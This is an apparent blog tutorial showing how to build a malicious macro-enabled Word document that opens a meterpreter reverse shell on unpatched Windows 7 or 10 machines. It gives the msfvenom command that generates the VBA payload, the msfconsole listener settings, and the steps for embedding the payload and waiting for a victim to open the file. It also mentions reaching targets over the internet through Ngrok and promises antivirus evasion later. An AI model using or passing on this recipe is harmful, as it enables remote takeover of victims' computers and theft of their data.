THIS METHOD IS FOR WINDOWS MACHINES WITH MINIMAL SECURITY
The idea here to hack windows 7 or 10 with a simple word document file running macros inside it, but as I said on the top of the topic, this machine has to be with low security system or not updated on a regular basis.
Let’s start by creating the malicious code with “msfvenom”:
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.11 lport=4444 -f vba
copy the out put of the code, we’re going to pate it inside the macro of the word document file. Now let’s start the listener port for the reverse shell using “msfconsole”:
The configuration should be as follow:
set payload windows/meterpreter/reverse_https
set lhost <your IP>
set lport <your port>
Now let’s open Word on your windows machine and go to “view” then click on “macro” then give it a name “Test” and then create:
Now past the code from the “msvenome” inside the macro section:
Save it with any name but as “Word Macro-Enabled Document:
Now on the Linux machine terminal, just type “exploit” and we wait for the victim to open the Word file “in this case we are the victim”:
Now as soon as the file is opened, we will get a reverse shell back:
Keep in mind this method is 50/50 chance to work, in some cases it worked with me even on WAN network using Ngrok, and sometimes the anti-virus caught it on running.
There are some other methods to bypass the AV, I will try to write about them in the future.